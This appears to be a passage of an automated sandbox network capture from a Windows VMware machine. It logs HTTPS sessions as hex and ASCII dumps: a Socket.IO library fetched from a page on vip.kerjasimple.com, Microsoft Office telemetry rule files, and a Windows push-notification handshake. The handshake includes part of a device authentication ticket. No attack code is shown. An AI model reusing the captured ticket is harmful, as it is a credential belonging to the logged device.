                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://vip.kerjasimple.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:02 UTC702INHTTP/1.1 200 OK
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Content-Length: 49993
                                                        Connection: close
                                                        Accept-Ranges: bytes
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=31536000, immutable
                                                        Content-Disposition: inline; filename="socket.io.min.js"
                                                        Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                        ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                        Server: Vercel
                                                        Strict-Transport-Security: max-age=63072000
                                                        X-Vercel-Cache: HIT
                                                        X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 1feab8d6a8e5cc920c359b62fd33d3de.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: FRA56-P8
                                                        X-Amz-Cf-Id: WfB_11xon_agHAjfSf2Vn53c0Uaga6u-Vydx3KFLJYUh66TGFJOoeg==
                                                        Age: 9132613
                                                        2024-11-12 15:27:02 UTC15682INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                        Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                        2024-11-12 15:27:02 UTC16384INData Raw: 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e
                                                        Data Ascii: d this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fun
                                                        2024-11-12 15:27:03 UTC16384INData Raw: 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69
                                                        Data Ascii: e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,thi
                                                        2024-11-12 15:27:03 UTC1543INData Raw: 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e
                                                        Data Ascii: etTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20192.168.2.64973913.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:02 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:02 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:02 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 486
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                        ETag: "0x8DC582BB344914B"
                                                        x-ms-request-id: e3607b55-f01e-001f-47a5-345dc8000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152702Z-15869dbbcc6j87jfhC1DFWr0yc0000000840000000008tz3
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:02 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21192.168.2.64974013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:02 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:02 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:02 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 427
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                        ETag: "0x8DC582BA310DA18"
                                                        x-ms-request-id: 30929569-101e-008d-79ff-2c92e5000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152702Z-16547b76f7fdf69shC1DFWcpd00000000fmg00000000q4gz
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:02 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22192.168.2.64974113.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:02 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:02 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:02 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 486
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                        ETag: "0x8DC582B9018290B"
                                                        x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152702Z-16547b76f7fknvdnhC1DFWxnys0000000fy0000000002hey
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:02 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23192.168.2.64974213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:02 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:02 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:02 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 407
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                        ETag: "0x8DC582B9698189B"
                                                        x-ms-request-id: 09da145b-201e-0033-5108-32b167000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152702Z-16547b76f7fkj7j4hC1DFW0a9g0000000fq000000000nr8f
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:02 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24192.168.2.64973840.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:02 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 31 72 32 38 54 71 79 68 6b 6b 6d 43 4c 34 72 4b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 64 62 38 38 64 62 62 65 35 35 30 63 62 33 62 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: 1r28TqyhkkmCL4rK.1Context: 4db88dbbe550cb3b
                                                        2024-11-12 15:27:02 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-11-12 15:27:02 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 31 72 32 38 54 71 79 68 6b 6b 6d 43 4c 34 72 4b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 64 62 38 38 64 62 62 65 35 35 30 63 62 33 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 37 48 38 66 37 55 30 55 33 58 50 6e 6c 46 42 54 37 41 34 62 47 36 44 70 6a 4e 57 77 42 59 2f 59 33 57 67 4b 61 6a 39 54 41 52 38 70 32 64 34 4b 33 68 50 6c 6e 45 70 6a 33 68 41 53 42 46 67 56 47 34 5a 33 54 6d 4a 63 74 76 39 54 7a 71 47 61 59 52 38 31 65 38 42 4a 48 76 6b 63 4f 6b 72 56 39 65 39 4c 63 4d 6b 52 76 33 79 34
                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 1r28TqyhkkmCL4rK.2Context: 4db88dbbe550cb3b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZ7H8f7U0U3XPnlFBT7A4bG6DpjNWwBY/Y3WgKaj9TAR8p2d4K3hPlnEpj3hASBFgVG4Z3TmJctv9TzqGaYR81e8BJHvkcOkrV9e9LcMkRv3y4
                                                        2024-11-12 15:27:02 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 31 72 32 38 54 71 79 68 6b 6b 6d 43 4c 34 72 4b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 64 62 38 38 64 62 62 65 35 35 30 63 62 33 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: 1r28TqyhkkmCL4rK.3Context: 4db88dbbe550cb3b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                        2024-11-12 15:27:03 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-11-12 15:27:03 UTC58INData Raw: 4d 53 2d 43 56 3a 20 74 4a 6b 51 37 37 46 50 44 6b 61 37 4e 61 69 73 63 72 67 53 44 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: tJkQ77FPDka7NaiscrgSDg.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25192.168.2.64974313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:03 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:03 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:03 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 469
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                        ETag: "0x8DC582BBA701121"
                                                        x-ms-request-id: f6249f53-a01e-0053-16a5-348603000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152703Z-17df447cdb5vp9l9hC1DFW5hw800000007vg000000002r33
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:03 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26192.168.2.64974413.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:03 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:03 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:03 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 415
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                        ETag: "0x8DC582BA41997E3"
                                                        x-ms-request-id: 87935f62-301e-0033-36a7-34fa9c000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152703Z-17df447cdb54qlp6hC1DFW67e800000001x000000000cyun
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:03 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27192.168.2.64974513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:03 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
